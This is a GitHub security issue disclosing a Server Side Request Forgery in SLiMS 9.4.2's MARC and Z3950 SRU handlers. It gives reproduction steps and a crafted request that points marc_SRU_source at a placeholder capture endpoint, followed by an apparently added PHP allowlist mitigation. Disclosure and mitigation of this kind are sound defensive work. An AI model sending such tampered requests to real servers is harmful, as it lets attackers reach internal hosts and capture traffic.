
[Security Bugs] Server Side Request Forgery #158

Closed
@0xdc9

Description

The bug
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php.

Reproduce
Steps to reproduce the behavior:

  1. Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography, then go to copy cataloguing
  2. Choose between MARC SRU or Z3950 SRU
  3. Type in whatever you want in the search bar
  4. Turn Burp Suite intercept on
  5. Change the z3950_SRU_source or marc_SRU_source parameter value to some URL that captures the traffic
  6. Forward the request
  7. Or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN

Screenshots

Normal request

[Screenshot: Screen Shot 2022-08-12 at 04 11 39]

Tampered request and SSRF trigger (netcat)

[Screenshot: Screen Shot 2022-08-12 at 04 13 21]

Tampered request and SSRF trigger (toptal.com)

[Screenshot: Screen Shot 2022-08-12 at 04 22 25]

Versions

  • OS: macOS Mojave 10.14.6
  • Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
  • Slims Version: slims9_bulian-9.4.2
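The report above boils down to the handlers accepting an arbitrary URL in marc_SRU_source / z3950_SRU_source and fetching it server-side. The following is an added mitigation example, not SLiMS code and not from the reporter: it resolves the user-supplied value against a server-side allowlist of configured SRU endpoints and hands back only the trusted copy. The $allowedSources list, its placeholder URLs and the function name are assumptions.

```php
<?php
// Added example (not SLiMS code): validate a user-supplied SRU source URL
// against a server-side allowlist before any outbound request is made.
// $allowedSources and its placeholder endpoints are constructed for this example.
$allowedSources = [
    'https://sru.example.org/sru',          // placeholder endpoint
    'https://catalogue.example.net/sru2',   // placeholder endpoint
];

/**
 * Return the matching allowlisted URL, or null when the candidate does not
 * exactly match a configured endpoint (scheme, host, port and path).
 * The trusted copy is returned so attacker-controlled userinfo, query or
 * fragment parts never reach the HTTP client.
 */
function resolveSruSource(string $candidate, array $allowed): ?string
{
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Reject embedded credentials (user:pass@host) outright.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    // Only plain HTTP(S) SRU endpoints; blocks file://, gopher:// and friends.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    foreach ($allowed as $url) {
        $a = parse_url($url);
        if ($a === false) {
            continue;
        }
        $same = strtolower($a['scheme']) === strtolower($parts['scheme'])
            && strtolower($a['host']) === strtolower($parts['host'])
            && ($a['port'] ?? null) === ($parts['port'] ?? null)
            && rtrim($a['path'] ?? '/', '/') === rtrim($parts['path'] ?? '/', '/');
        if ($same) {
            return $url;   // hand back the trusted copy, never the raw input
        }
    }
    return null;
}

// Illustrative use at the top of a handler such as marcsru.php:
$source = resolveSruSource($_GET['marc_SRU_source'] ?? '', $allowedSources);
if ($source === null) {
    http_response_code(400);
    exit('marc_SRU_source is not a configured SRU endpoint');
}
// Only now build the SRU query URL from $source and fetch it.
```

Selecting the endpoint by an integer index into the configured list, rather than echoing a URL through the request at all, removes the parsing step entirely and is the simpler fix where the UI allows it.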
